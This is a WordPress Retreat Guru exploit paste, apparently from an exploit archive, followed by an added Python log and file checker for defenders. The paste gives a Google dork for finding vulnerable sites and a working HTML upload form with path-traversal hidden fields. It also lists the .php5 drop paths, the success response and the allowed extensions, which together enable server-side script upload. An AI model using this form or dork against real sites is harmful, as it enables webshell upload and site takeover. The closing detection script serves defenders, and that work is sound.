- ####################################################################
- # Exploit Title : WordPress Retreat Guru Cross Site Request Forgery
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22/05/2019
- # Vendor Homepage : retreat.guru - gravityforms.com
- # Software Affected Versions : N/A
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:Site by Retreat Guru site:com
- # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- WordPress Retreat Guru is vulnerable to cross-site request forgery, caused by
- improper validation of user-supplied input. By persuading an authenticated user to visit
- a malicious Web site, a remote attacker could send a malformed HTTP request to
- perform unauthorized actions. An attacker could exploit this vulnerability to perform
- cross-site scripting attacks, Web cache poisoning, and other malicious activities.
- The web application does not, or cannot, sufficiently verify whether a well-formed,
- valid, consistent request was intentionally provided by the user who submitted the request.
- When a web server is designed to receive a request from a client without any mechanism
- for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
- client into making an unintentional request to the web server which will be treated as an
- authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
- can result in exposure of data or unintended code execution.
- ####################################################################
- # CSRF Cross Site Request Forgery Exploit :
- ****************************************
- <title>WordPress Retreat Guru Input Exploiter</title>
- <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
- <body background=" ">
- <input type="file" name="file" id="file"><br>
- <input name="form_id" value="../../../" type="hidden">
- <input name="name" value="kingskrupellos.html" type="hidden">
- <input name="gform_unique_id" value="../../" type="hidden">
- <input name="field_id" value="" type="hidden">
- <input type="submit" name="gform_submit" value="submit">
- </form>
- # Directory File Path :
- ***********************
- /_input__kingskrupellos.php5
- /_input__[YOURFILENAME].php5
- # Vulnerability Error :
- *******************
- {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
- # Vulnerability Error [ Successful ] :
- *******************************
- {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
- # Allowed File Extensions :
- *************************
- .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
- # Example Usage for Windows :
- ******************************
- # Use with XAMPP Control Panel and your Localhost.
- # Use from htdocs folder located in XAMPP
- # 127.0.0.1/wordpressretreatguruexploiter.html
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
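
For defenders triaging a site against this advisory, the following added example (not part of the original paste, and not Retreat Guru or Gravity Forms code) flags POSTs to ?gf_page=upload that did not originate from the site's own pages and lists files in the web root that match the _input_ temp-file naming with a server-executable extension. The combined log format, the host example.org and all sample lines and paths are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Server-executable extensions from the advisory's "Allowed File Extensions"
# list, plus .php as seen in its "uploaded_filename" response.
SCRIPT_EXTS = {".php", ".php2", ".php5", ".phtml"}
# Assumed combined log format: "METHOD target proto" status size "referer"
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')

# Constructed sample data; example.org stands in for the protected site.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/May/2019:10:00:01 +0000] "POST /?gf_page=upload HTTP/1.1" '
    '200 120 "http://127.0.0.1/wordpressretreatguruexploiter.html" "Mozilla/5.0"',
    '198.51.100.4 - - [22/May/2019:10:02:13 +0000] "POST /?gf_page=upload HTTP/1.1" '
    '200 98 "https://example.org/booking/" "Mozilla/5.0"',
    '203.0.113.7 - - [22/May/2019:10:03:40 +0000] "GET /_input__kingskrupellos.php5 '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
SAMPLE_FILES = [
    "/var/www/html/_input__kingskrupellos.php5",
    "/var/www/html/wp-content/uploads/gravity_forms/abc_input_3_photo.jpg",
    "/var/www/html/index.php",
]

def suspicious_uploads(log_lines, site_host):
    """Return (line_no, reason) for upload POSTs with a missing or off-site Referer."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = LOG_RE.search(line)
        if not m or m["method"] != "POST":
            continue
        if parse_qs(urlsplit(m["target"]).query).get("gf_page") != ["upload"]:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host is None:
            hits.append((no, "no referer"))
        elif ref_host != site_host:
            hits.append((no, f"cross-site referer {ref_host}"))
    return hits

def dropped_scripts(paths):
    """Return paths named like upload temp files that carry a script extension."""
    return [p for p in paths
            if "_input_" in posixpath.basename(p)
            and posixpath.splitext(p)[1].lower() in SCRIPT_EXTS]

if __name__ == "__main__":
    print(suspicious_uploads(SAMPLE_LOG, "example.org"))
    print(dropped_scripts(SAMPLE_FILES))
```

A missing Referer can be legitimate (privacy settings, proxies), so treat log hits as leads to correlate with the file findings rather than as proof on their own.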